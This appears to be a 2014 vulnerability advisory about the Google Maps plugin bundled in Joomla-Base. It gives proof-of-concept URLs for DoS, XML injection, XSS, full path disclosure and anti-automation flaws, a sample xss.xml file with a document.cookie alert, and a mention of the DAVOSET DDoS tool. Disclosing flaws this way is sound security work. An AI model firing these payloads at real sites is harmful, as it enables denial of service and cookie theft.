Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  Multiple vulnerabilities in Flexolio for WordPress

  Multiple vulnerabilities in Js-Multi-Hotel for WordPress

  XSS and FPD vulnerabilities in Js-Multi-Hotel for WordPress

  Vulnerabilities in Js-Multi-Hotel for WordPress

From:MustLive <mustlive_(at)_websecurity.com.ua>
Date:4 мая 2014 г.
Subject:Multiple vulnerabilities in Joomla-Base


Hello 3APA3A!

These are Denial of Service, XML Injection, Cross-Site Scripting, Full path disclosure and Insufficient Anti-automation vulnerabilities in Joomla-Base. This is package of Joomla with different plugins (with their vulnerabilities).

These vulnerabilities are in Google Maps plugin for Joomla, which is used in this package. In 2013-2014 I wrote advisories about multiple vulnerabilities in Google Maps plugin (http://securityvulns.ru/docs29645.html, http://securityvulns.ru/docs29670.html and http://seclists.org/fulldisclosure/2014/Feb/53).

-------------------------
Affected products:
-------------------------

Vulnerable are all versions of Joomla-Base, which includes this plugin.

After my informing, the developer removed this plugin from his package (https://github.com/pabloarias/Joomla-Base/issues/1).

-------------------------
Affected vendors:
-------------------------

Pablo Arias
https://github.com/pabloarias/Joomla-Base

----------
Details:
----------

Denial of Service (WASC-10):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.
php?url=google.com

Besides conducting DoS attack manually, it's also possible to conduct automated DoS and DDoS attacks with using of DAVOSET (http://lists.webappsec.org/pipermail/websecurity_lists.webappsec.org/2013-Ju
ne/008850.html
).

XML Injection (WASC-23):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.
php?url=site2/xml.xml

It's possible to include external xml-files. Which also can be used for XSS attack:

XSS via XML Injection (WASC-23):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.
php?url=site2/xss.xml

File xss.xml:

<?xml version="1.0" encoding="utf-8"?>
<feed>
 <title>XSS</title>
 <entry>
 <div xmlns="http://www.w3.org/1999/xhtml"><script>alert(documen
t.cookie)</script></div>
 </entry>
</feed>

Cross-Site Scripting (WASC-08):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.
php?url=%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure (WASC-13):

http://site/plugins/system/plugin_googlemap2/plugin_googlemap2_proxy.php

This is possible with corresponding PHP settings, when warnings are shown.

Insufficient Anti-automation (WASC-21):

In this functionality there is no reliable protection from automated requests.

Also in my third advisory concerning Google Maps plugin, I wrote about security bypass for built-in domain restriction functionality and described method of bypass protection against automated requests introduced in version 3.2. So even the latest version is vulnerable to IAA.

Best wishes & regards,
Eugene Dokukin aka MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород